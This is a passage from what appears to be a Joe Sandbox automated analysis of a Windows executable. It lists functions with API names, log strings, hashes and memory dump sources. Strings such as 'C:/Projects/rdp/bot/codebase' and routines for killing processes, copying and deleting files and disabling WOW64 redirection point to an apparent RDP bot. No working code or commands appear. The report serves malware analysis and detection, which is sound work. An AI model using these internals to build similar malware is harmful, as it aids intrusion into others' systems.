                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                                                                                                                                  • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                                                                                                                                  • API String ID: 1211020085-2360327764
                                                                                                                                                  • Opcode ID: 7f8c46a060ecb3e684575abd229e24c162cf90270895cbde5324f7f026056966
                                                                                                                                                  • Instruction ID: ef208d7226c581cb757e5c550da8cdcdafab4f8460dc031c6a22cc30a551b83a
                                                                                                                                                  • Opcode Fuzzy Hash: 7f8c46a060ecb3e684575abd229e24c162cf90270895cbde5324f7f026056966
                                                                                                                                                  • Instruction Fuzzy Hash: 06118E13A3974386FA54BB91A48033AB6A1EF5CF95FC44035CD0E4A695DE2FEC4582E1
                                                                                                                                                  Function 00007FF775725189 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CopyErrorFileLastfflushfwrite
                                                                                                                                                  • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                                                                                                                                  • API String ID: 2887799713-3464183404
                                                                                                                                                  • Opcode ID: 258efda593b9751e153bce364f0c496ffa623c059537ce1f1eb98cea2cb181b3
                                                                                                                                                  • Instruction ID: 697032dcc08a577f997ffbd7bd46df930848fa20a5ac8b2de9c0397efab7d192
                                                                                                                                                  • Opcode Fuzzy Hash: 258efda593b9751e153bce364f0c496ffa623c059537ce1f1eb98cea2cb181b3
                                                                                                                                                  • Instruction Fuzzy Hash: 40415D53D3D65681FA286706A800779E660FF08FDCFD41132CD0F4E695FEACAA8187A1
                                                                                                                                                  Function 00007FF775724BBD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                                  • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                                                                                                                                                  • API String ID: 2018770650-4119452840
                                                                                                                                                  • Opcode ID: 70adc8483f92db5b97f1c2f973f890455b7fae02d4dbbafe052feed73f037721
                                                                                                                                                  • Instruction ID: 784fe9b4deb060128ccef58dee0725151e9ce6bbe5dcaf92137ce588c43bf6c6
                                                                                                                                                  • Opcode Fuzzy Hash: 70adc8483f92db5b97f1c2f973f890455b7fae02d4dbbafe052feed73f037721
                                                                                                                                                  • Instruction Fuzzy Hash: 94313D77F3C78B42FA20B708A442378A262DF8DF55FD54432CA1E47291ED1DA88583B6
                                                                                                                                                  Function 00007FF77572749C Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 157stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen
                                                                                                                                                  • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
                                                                                                                                                  • API String ID: 39653677-892027187
                                                                                                                                                  • Opcode ID: 7e3e5ad8cb6b2cb1cc7950dd06a98d49d16e3d1cdf5b6947af58537b1bd22828
                                                                                                                                                  • Instruction ID: 288a7105271888edee6999da357229cc7a87e5412c4afeb6107459999e9fe03d
                                                                                                                                                  • Opcode Fuzzy Hash: 7e3e5ad8cb6b2cb1cc7950dd06a98d49d16e3d1cdf5b6947af58537b1bd22828
                                                                                                                                                  • Instruction Fuzzy Hash: 5851F353E391A341FA25AF57AA157B5D661FF19F88FD48036DA0E0F290DE2CE50183E0
                                                                                                                                                  Function 00007FF775726C99 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 57stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$strcat
                                                                                                                                                  • String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
                                                                                                                                                  • API String ID: 2335785903-2423714266
                                                                                                                                                  • Opcode ID: a7263ece55ac66402f61714a18821357c26097506aba275a208afbb56e04a119
                                                                                                                                                  • Instruction ID: 15defca20e5375378e6deff3a9dcd6500b9c8f91ff5fe503fa36604043ec914f
                                                                                                                                                  • Opcode Fuzzy Hash: a7263ece55ac66402f61714a18821357c26097506aba275a208afbb56e04a119
                                                                                                                                                  • Instruction Fuzzy Hash: 4811B163A386D784FA157F2698047B5D6A19F09F94FDC8031DE4D0A282EE3CE44083E0
                                                                                                                                                  Function 00007FF77572CACD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fwprintf$strlen
                                                                                                                                                  • String ID: %*.*S$%-*.*S$%.*S
                                                                                                                                                  • API String ID: 2636243462-2115465065
                                                                                                                                                  • Opcode ID: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
                                                                                                                                                  • Instruction ID: 6a303cb398ab87ef499c7c09d88c3bc557ee2082cfc95b470efbbb16b5f23bf5
                                                                                                                                                  • Opcode Fuzzy Hash: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
                                                                                                                                                  • Instruction Fuzzy Hash: 9C31B563E3869295E750BF259800578E2B9EB5CFA4F94C131DD1DCBB89DE2CE40487E0
                                                                                                                                                  Function 00007FF77572385C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 39COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastLibraryLoadProc
                                                                                                                                                  • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                                                                                                                                                  • API String ID: 3511525774-1584720945
                                                                                                                                                  • Opcode ID: 50df767f8501ed74331c8b0ddd7b97ee671556bd33cf9003b2d1b5af15f3632e
                                                                                                                                                  • Instruction ID: d29032ac8beb82311521b7e441162056f5614f94acbbce4144c221ee2f80b4c1
                                                                                                                                                  • Opcode Fuzzy Hash: 50df767f8501ed74331c8b0ddd7b97ee671556bd33cf9003b2d1b5af15f3632e
                                                                                                                                                  • Instruction Fuzzy Hash: 3611BA62E3DA8B91FB20B715E8517B4A260BF5CF14FC00035D44D8A6A1EE6CE545C3F0
                                                                                                                                                  Function 00007FF7757237C0 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                                                                                                                                                  • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                                                                                                                                                  • API String ID: 1533789296-1853374401
                                                                                                                                                  • Opcode ID: 912ea9ecdca557dc472daf9a7d8af5cb4c2ed42afdfd20a5a6a17484d27a2de8
                                                                                                                                                  • Instruction ID: fe7c38449db60ea308abbc0e8b710fa213d93959d4aef536daf492d06441f65d
                                                                                                                                                  • Opcode Fuzzy Hash: 912ea9ecdca557dc472daf9a7d8af5cb4c2ed42afdfd20a5a6a17484d27a2de8
                                                                                                                                                  • Instruction Fuzzy Hash: 02019362E3898B91FA61BB15EC517B4A260AF1CB14FC05036D44E8A6A1EF6DE945C3F0
                                                                                                                                                  Function 00007FF7757233C0 Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 24COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                  • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
                                                                                                                                                  • API String ID: 2962429428-1801624891
                                                                                                                                                  • Opcode ID: 53d2facdb7f46f7679e411fb2711f4893f1e8d97bd897c0b7eb70dd6e9c8b024
                                                                                                                                                  • Instruction ID: fe46fcf55bcc9d3d81f18b05bb88156e3a0de171b42f1c68210b5d9b388a2196
                                                                                                                                                  • Opcode Fuzzy Hash: 53d2facdb7f46f7679e411fb2711f4893f1e8d97bd897c0b7eb70dd6e9c8b024
                                                                                                                                                  • Instruction Fuzzy Hash: 34F01C63A3888F80EA10EB66EC501A8A720FF48B68FC44132D90D47261DF3DEA47C394
                                                                                                                                                  Function 00007FF775727E04 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DeviceErrorLastQuery
                                                                                                                                                  • String ID: %S%S$[E] (%s) -> QueryDosDeviceW failed(gle=%lu)$path_convert_to_nt
                                                                                                                                                  • API String ID: 963133057-3473575966
                                                                                                                                                  • Opcode ID: 2ecc8d21c77ad793d7cdb5c91fca38b749c2df80d8d0a7740a79bdbd090e6c32
                                                                                                                                                  • Instruction ID: f10003bc0f74fd028300510cf448bc569de5ef512f88a0ef2a7e8addbf656b0d
                                                                                                                                                  • Opcode Fuzzy Hash: 2ecc8d21c77ad793d7cdb5c91fca38b749c2df80d8d0a7740a79bdbd090e6c32
                                                                                                                                                  • Instruction Fuzzy Hash: BF418C53E3C5A682FB34771496403B9D261EF49F64FD50032DD4E1B281DE2CAC8283E2
                                                                                                                                                  Function 00007FF77572CCD9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 83COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fwprintf
                                                                                                                                                  • String ID: %*.*s$%-*.*s$%.*s$%S%S
                                                                                                                                                  • API String ID: 968622242-2451587232
                                                                                                                                                  • Opcode ID: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
                                                                                                                                                  • Instruction ID: 351ef12394222c0953c57f9708c35fb5ead6ef89efb5c8f7f1e74d22d8efe2f8
                                                                                                                                                  • Opcode Fuzzy Hash: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
                                                                                                                                                  • Instruction Fuzzy Hash: 7C31C873E3856356E760AF259806678EAA8EF5CFA4F94C131C90D4B684DE2CE40087E0
                                                                                                                                                  Function 00007FF77572193C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalDeleteSectionfclose
                                                                                                                                                  • String ID: Done$[I] (%s) -> %s$debug_cleanup
                                                                                                                                                  • API String ID: 3387974148-4247581856
                                                                                                                                                  • Opcode ID: 83038e760c19e10a84288811280327471e0e63595a5ea71a4685ebea14fceab6
                                                                                                                                                  • Instruction ID: 697987908cabefda84a4c7c15326c854a141ecf141afd65f699db85ed01bc13e
                                                                                                                                                  • Opcode Fuzzy Hash: 83038e760c19e10a84288811280327471e0e63595a5ea71a4685ebea14fceab6
                                                                                                                                                  • Instruction Fuzzy Hash: A4F01762A3A6C384FA04BB50E8AA374A370BF48F24FC40035C40E162A0CF7D6449C3F0
                                                                                                                                                  Function 00007FF77572A96B Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 165memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00007FF77573A1E8,00000000,?,?,?,00007FF77573A1E0,00007FF775721208,?,?,?,00007FF775721313), ref: 00007FF77572ABC2
                                                                                                                                                  Strings
                                                                                                                                                  • Unknown pseudo relocation bit size %d., xrefs: 00007FF77572AAEB
                                                                                                                                                  • Unknown pseudo relocation protocol version %d., xrefs: 00007FF77572AA62
                                                                                                                                                  • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF77572AB5D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                                                                  • API String ID: 544645111-1286557213
                                                                                                                                                  • Opcode ID: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
                                                                                                                                                  • Instruction ID: ef4cd855466ddcf6c4c691b4fe164d9ef02ef7c3fe27b5a7db0e09459e1c8f33
                                                                                                                                                  • Opcode Fuzzy Hash: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
                                                                                                                                                  • Instruction Fuzzy Hash: B2618C63B386928AEA20AB15D9406B8A3B1EF48FB4F848135C91D437D5DE7CE581C7A0
                                                                                                                                                  Function 00007FF7757219C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorHandleLastModule
                                                                                                                                                  • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                                                                                                                                                  • API String ID: 4242514867-2427012484
                                                                                                                                                  • Opcode ID: 19e446ec0c41354afb0a0de50050c7868acf40ae54805d932c69ebf6a90a09b1
                                                                                                                                                  • Instruction ID: beab35126b9528e9d126fa931a77d591137eaa849a34b698c7561e1a6b4cbcb0
                                                                                                                                                  • Opcode Fuzzy Hash: 19e446ec0c41354afb0a0de50050c7868acf40ae54805d932c69ebf6a90a09b1
                                                                                                                                                  • Instruction Fuzzy Hash: C9F03022A3C68280E720AB54E844369B770FB4CBA8FC40136C58D026B4CE2CD148C7F0
                                                                                                                                                  Function 00007FF775730150 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
